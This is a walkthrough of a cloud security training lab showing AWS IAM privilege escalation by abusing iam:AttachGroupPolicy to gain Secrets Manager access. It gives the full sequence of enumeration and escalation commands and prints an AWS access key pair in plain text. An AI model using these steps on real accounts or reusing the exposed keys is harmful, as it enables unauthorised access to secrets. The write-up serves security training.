AWS Pentesting: IAM Privilege Escalation via iam:AttachGroupPolicy
In this writeup, we will do a walkthrough on Cybr’s IAM AttachGroupPolicy PrivEsc lab, which highlights privilege escalation by abusing the iam:AttachGroupPolicy permission which attaches the specified managed policy to the specified IAM group.
The image above shows that our IAM user is “iam-attachgrouppolicy-privesc-1735037359663-SeniorDev”.
The lab mentioned that our main goal is to escalate our permission to we can read the resources in the Secret Manager service.
We can run the secretmanager command below to check our permission.
aws secretsmanager list-secrets --profile AttachGroupPolicy
Let run as usual the aws-enumerator tool using the command below. We can get this tool from this link.
./aws-enumerator cred -aws_access_key_id AKIAX6IOGWSM5KEGLGU2 -aws_secret_access_key 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
./aws-enumerator enum -services all -speed slow
./aws-enumerator dump -services sts,iam
Based on the output, we can ListUsers, ListPolicies, GetUser, and ListGroups.
Lets check the users.
aws iam list-users --profile AttachGroupPolicy
Lets focus on roles, groups or user’s policies that are associated with our current IAM user which is iam-attachgrouppolicy-privesc-1735031779719-SeniorDev
Run the commands below to check for the inline and the attached user policies.
aws iam list-user-policies --user-name iam-attachgrouppolicy-privesc-1735037359663-SeniorDev --profile AttachGroupPolicy
aws iam list-attached-user-policies --user-name iam-attachgrouppolicy-privesc-1735037359663-SeniorDev --profile AttachGroupPolicy
There is an inline customer managed policy named “iam-attachgrouppolicy-privesc-1735037359663-senior-manager”
Run the get-user-policy IAM command below to check the details of this policy.
aws iam get-user-policy --user-name iam-attachgrouppolicy-privesc-1735037359663-SeniorDev --policy-name iam-attachgrouppolicy-privesc-1735037359663-senior-manager --profile AttachGroupPolicy
The image above shows that we have iam:AttachGroupPolicy permission to the iam-attachgrouppolicy-privesc-1735037359663-Developers group.
Lets check our group membership.
The image below shows that our IAM user is also a member of that group. This means that, since we have the iam:AttachGroupPolicy permission, we can modify or attach a policy to the current group we are a member of, which could escalate our privileges
aws iam list-groups-for-user --user-name iam-attachgrouppolicy-privesc-1735037359663-SeniorDev --profile AttachGroupPolicy
Let run “list-group-policies” and “get-group-policy” commands to get the details of inline policies for our group. We can also run the “list-attached-group-policies” to check for the attached policies for the group. Our user doesn't have permission though as shown in aws-enumerator tool or we can run this manually.
aws iam list-group-policies --group-name iam-attachgrouppolicy-privesc-1735037359663-Developers --profile AttachGroupPolicyThe output below shows that there is a a policy for the group named “ iam-attachgrouppolicy-privesc-1735037359663-developers”
aws iam get-group-policy --group-name iam-attachgrouppolicy-privesc-1735037359663-Developers --policy-name iam-attachgrouppolicy-privesc-1735037359663-developers --profile AttachGroupPolicy
As an option, you may cross check this privilege escalation vector using Pacu.
run iam__enum_permissions
run iam__enum_users_roles_policies_groups
run iam__privesc_scanPacu confirms that we can escalate this using AttachGroupPolicy.
Let’s now leverage this permission to try adding permissions for different services. The commands below show that we attempted to add the arn:aws:iam::aws:policy/AdministratorAccess ARN, but this was not allowed. However, running arn:aws:iam::aws:policy/SecretsManagerReadWrite, which grants us access to list and read the contents of secrets in Secrets Manager, returned no error, indicating that the command was accepted.
aws iam attach-group-policy --group-name iam-attachgrouppolicy-privesc-1735037359663-Developers --policy-arn arn:aws:iam::aws:policy/AdministratorAccess --profile AttachGroupPolicy
aws iam attach-group-policy --group-name iam-attachgrouppolicy-privesc-1735037359663-Developers --policy-arn arn:aws:iam::aws:policy/SecretsManagerReadWrite --profile AttachGroupPolicy
Lets confirm that we have escalated our permission by running “list-secrets” secretsmanager command.
aws secretsmanager list-secrets --profile AttachGroupPolicy
As a final step, view the secret string by using the “get-secret-value” command below.
aws secretsmanager get-secret-value --secret-id iam-attachgrouppolicy-privesc-1735037359663-final_flag --profile AttachGroupPolicy
Conclusion:
In this walkthrough, we showed how privilege escalation can be performed by abusing the iam:AttachGroupPolicy permission. In this lab, we also showed our recon methodology on IAM permissions and covered tools such as IAM Enumerator and Pacu.
References:
https://cybr.com/hands-on-labs/lab/iam-attachgrouppolicy-privesc/
https://hackingthe.cloud/aws/exploitation/iam_privilege_escalation/
https://docs.aws.amazon.com/IAM/latest/APIReference/API_AttachGroupPolicy.html
